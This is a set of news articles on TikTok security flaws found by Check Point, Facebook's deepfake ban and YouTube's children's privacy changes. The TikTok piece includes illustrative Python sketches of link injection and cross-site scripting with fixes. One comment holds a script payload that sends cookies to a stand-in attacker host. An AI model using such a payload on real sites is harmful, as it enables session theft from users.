Major TikTok Security Flaws Found

TEL AVIV — TikTok, the smartphone app beloved by teenagers and used by hundreds of millions of people around the world, had serious vulnerabilities that would have allowed hackers to manipulate user data and reveal personal information, according to research published Wednesday by Check Point, a cybersecurity company in Israel.

The weaknesses would have allowed attackers to send TikTok users messages that carried malicious links. Once users clicked on the links, attackers would have been able to take control of their accounts, including uploading videos or gaining access to private videos. A separate flaw allowed Check Point researchers to retrieve personal information from TikTok user accounts through the company’s website.

“The vulnerabilities we found were all core to TikTok’s systems,” said Oded Vanunu, Check Point’s head of product vulnerability research.

TikTok learned about the conclusions of Check Point’s research on Nov. 20 and said it had fixed all of the vulnerabilities by Dec. 15.

The app, whose parent company is based in Beijing, has been called “the last sunny corner on the internet.” It allows users to post short, creative videos, which can easily be shared on various apps.

It has also become a target of lawmakers and regulators who are suspicious of Chinese technology. Several branches of the United States military have barred personnel from having the app on government-issued smartphones. The vulnerabilities discovered by Check Point are likely to compound those concerns.

TikTok has exploded in popularity over the past two years, becoming a rare Chinese internet success story in the West. It has been downloaded more than 1.5 billion times, according to the data firm Sensor Tower. Near the end of 2019, the research firm said TikTok appeared to be on its way to more downloads for the year than better-known apps from Facebook, Instagram, YouTube and Snap.

But new apps like TikTok offer opportunities for hackers looking to target services that haven’t been tested through years of security research and real-world attacks. And many of its users are young and perhaps not mindful of security updates.

“TikTok is committed to protecting user data,” said Luke Deshotels, the head of TikTok’s security team.

“Like many organizations, we encourage responsible security researchers to privately disclose zero day vulnerabilities to us,” he added. “Before public disclosure, Check Point agreed that all reported issues were patched in the latest version of our app. We hope that this successful resolution will encourage future collaboration with security researchers.”

Mr. Deshotels said there was no indication in customer records that a breach or an attack had occurred.

TikTok’s parent company, ByteDance, is one of the world’s most valuable tech start-ups. But TikTok’s popularity and its roots in China, where no large corporation can thrive outside the good graces of the government, have prompted intense scrutiny of the app’s content policies and data practices.

American lawmakers have expressed concern that TikTok censors material that the Chinese government does not like and allows Beijing to collect user data. TikTok has denied both accusations. The company also says that although ByteDance’s headquarters are in Beijing, regional managers for TikTok have significant autonomy over operations.

Check Point’s intelligence unit examined how easy it would be to hack into TikTok user accounts. It found that various functions of the app, including sending video files, had security issues.

“I would expect these types of vulnerabilities in a company like TikTok, which is probably more focused on tremendous growth, and on building new features for their users, rather than security,” said Christoph Hebeisen, the head of research at Lookout, another cybersecurity company.

One vulnerability allowed attackers to use a link in TikTok’s messaging system to send users messages that appeared to come from TikTok. The Check Point researchers tested the weakness by sending themselves links with malware that let them take control of accounts, upload content, delete videos and make private videos public.
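
Check Point did not publish TikTok’s code, and the sketch below is only a generic illustration of this class of bug: a minimal Python example, with hypothetical names such as build_invite_sms and TRUSTED_HOSTS, of how a “send me a download link” feature can be abused when it forwards a caller-supplied URL into an official-looking message unchecked, and how an allow-list check closes the hole.

    from urllib.parse import urlparse

    # Hypothetical allow-list of hosts the service actually controls.
    TRUSTED_HOSTS = {"example-app.com", "www.example-app.com"}

    def build_invite_sms(phone_number: str, download_url: str) -> str:
        # Vulnerable pattern: trusts whatever URL the request supplies, so the
        # resulting SMS looks official but can carry an attacker's link.
        return f"To {phone_number}: Get the app here: {download_url}"

    def build_invite_sms_safe(phone_number: str, download_url: str) -> str:
        # Hardened pattern: only send links that resolve to hosts we control.
        host = urlparse(download_url).hostname or ""
        if host not in TRUSTED_HOSTS:
            raise ValueError("refusing to send an untrusted link")
        return f"To {phone_number}: Get the app here: {download_url}"

    # A spoofed request like this would be rejected by the hardened version:
    # build_invite_sms_safe("+15555550100", "https://evil.example/payload.apk")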

The researchers also found that TikTok’s site was vulnerable to a type of attack that injects malicious code into trusted websites. Check Point researchers were able to retrieve users’ personal information, including names and birth dates.
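
The article does not describe the injection itself; as a hedged, generic illustration of this class of attack, commonly called cross-site scripting, the Python sketch below shows how echoing a query parameter into a page without escaping lets attacker-supplied script run in a visitor’s browser, and how escaping neutralizes it. The function names are hypothetical.

    from html import escape

    def search_results_vulnerable(query: str) -> str:
        # Echoes user input straight into HTML, so a query such as
        # "<script>fetch('https://evil.example/?c=' + document.cookie)</script>"
        # would run in the victim's browser and could leak account data.
        return f"<h1>Results for {query}</h1>"

    def search_results_safe(query: str) -> str:
        # Escaping turns the same payload into inert text.
        return f"<h1>Results for {escape(query)}</h1>"

    payload = "<script>alert('xss')</script>"
    print(search_results_vulnerable(payload))  # script tag survives intact
    print(search_results_safe(payload))        # &lt;script&gt;... rendered as text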

Check Point sent a summary of its findings to the Department of Homeland Security in the United States.

The Committee on Foreign Investment in the United States, a panel that reviews investment deals on national security grounds, is also looking into ByteDance’s 2017 acquisition of Musical.ly, a lip-syncing app that the company later merged into TikTok. That deal set the stage for TikTok’s rapid rise in the United States and Europe.

There are also concerns about the company’s data privacy practices. In February, the Federal Trade Commission filed a complaint against TikTok, saying it illegally collected personal information from minors. The complaint claimed that Musical.ly had violated the Children’s Online Privacy Protection Act, which requires websites and online services directed at children under 13 to obtain parental consent before collecting their personal information.

TikTok agreed to pay $5.7 million to settle the complaint and said it would abide by COPPA. TikTok is still being investigated by the British Information Commissioner’s Office to determine if it violated European privacy laws that offer special protections to minors and their data.

Ronen Bergman reported from Tel Aviv, Sheera Frenkel from San Francisco, and Raymond Zhong from Hong Kong.

Facebook Says It Will Ban ‘Deepfakes’

WASHINGTON — Facebook said on Monday that it would ban videos that are heavily manipulated by artificial intelligence, known as deepfakes, from its platform.

In a blog post, a company executive said Monday evening that the social network would remove videos altered by artificial intelligence in ways that “would likely mislead someone into thinking that a subject of the video said words that they did not actually say.”

The policy will not extend to parody or satire, the executive, Monika Bickert, said, nor will it apply to videos edited to omit or change the order of words.

Ms. Bickert said all videos posted would still be subject to Facebook’s system for fact-checking potentially deceptive content. Content found to be factually incorrect appears less prominently on the site’s news feed and is labeled false.

The company’s new policy was first reported by The Washington Post.

Facebook was heavily criticized last year for refusing to take down an altered video of Speaker Nancy Pelosi that had been edited to make it appear as though she was slurring her words. At the time, the company defended its decision, saying it had subjected the video to its fact-checking process and had reduced its reach on the social network.

It did not appear that the new policy would have changed the company’s handling of the video of Ms. Pelosi.

The announcement comes ahead of a hearing before the House Energy & Commerce Committee on Wednesday morning, during which Ms. Bickert, Facebook’s vice president of global policy management, is expected to testify on “manipulation and deception in the digital age,” alongside other experts.

Because Facebook is still the No. 1 platform for sharing false political stories, according to disinformation researchers, there is particular urgency to spot and halt novel forms of digital manipulation before they spread.

Computer scientists have long warned that new techniques used by machines to generate images and sounds that are indistinguishable from the real thing can vastly increase the volume of false and misleading information online. And false political information is circulating rapidly online ahead of the 2020 presidential elections in the United States.

In late December, Facebook announced it had removed hundreds of accounts, including pages, groups and Instagram feeds, meant to fool users in the United States and Vietnam with fake profile photos generated with the help of artificial intelligence.

David McCabe reported from Washington, and Davey Alba from New York.

4 Things to Know About YouTube’s New Children’s Privacy Practices

In September, Google agreed to pay a $170 million fine and make privacy changes as regulators said that its YouTube platform had illegally harvested children’s personal information and used it to profit by targeting them with ads. The penalty and changes were part of an agreement with the Federal Trade Commission and the attorney general of New York, which had accused YouTube of violating the federal Children’s Online Privacy Protection Act.

On Monday, YouTube said it was beginning to introduce changes to address regulators’ concerns and better protect children. Here is what you need to know about those changes.

YouTube said that, starting Monday, it would begin to limit the collection and use of personal information from people who watched children’s videos, no matter the age of the viewer. Federal law prohibits online services aimed at children under 13 from collecting the personal information of those young users without parental consent.

YouTube said it had also turned off or limited some features on children’s videos tied to personal information. These include comments and live-chat features, as well as the ability to save videos to a playlist.

YouTube will no longer show ads on children’s videos that are targeted at viewers based on their web-browsing or other online activity data. Instead, the company said, it may now show ads based on the context of what people are viewing.

YouTube said viewers who watched a video made for children on its platform would now be more likely to see recommendations for other children’s videos.

In September, YouTube said it would require all video producers on its platform to designate their videos as made for children or not made for children. In November, it introduced a new setting to help producers flag children’s content, a designation that signals YouTube to limit data collection on those videos. The video service said that it was also using artificial intelligence to help identify children’s content and that it could override a video producer’s categorization if its system detected a mistake.
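
For developers who query videos programmatically, YouTube exposes this designation through its Data API; assuming the status.madeForKids field is available on the videos resource, a hedged sketch like the one below could read a video’s label (the API key and video ID are placeholders).

    import json
    from typing import Optional
    from urllib.parse import urlencode
    from urllib.request import urlopen

    def made_for_kids(video_id: str, api_key: str) -> Optional[bool]:
        # Assumed endpoint and field: YouTube Data API v3 videos.list with
        # part=status, which reports a madeForKids flag for each video.
        params = urlencode({"part": "status", "id": video_id, "key": api_key})
        with urlopen(f"https://www.googleapis.com/youtube/v3/videos?{params}") as resp:
            data = json.load(resp)
        items = data.get("items", [])
        if not items:
            return None  # video not found or not visible to this key
        # True whether the uploader declared the video as children's content or
        # the platform's own classifier applied the label.
        return items[0]["status"].get("madeForKids")

    # Example call (placeholders): made_for_kids("VIDEO_ID", "YOUR_API_KEY")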

YouTube is one of the most popular platforms for children. Some animated videos on YouTube channels aimed at younger children — like Cocomelon Nursery Rhymes and ChuChu TV — have been viewed more than a billion times.

The platform’s new limits on data-mining send a signal to other popular sites offering children’s content that they also may be subject to the federal children’s online privacy law. Musical.ly, a wildly popular video social network now known as TikTok, also had to pay a fine last year to settle F.T.C. charges that it had illegally collected children’s personal information.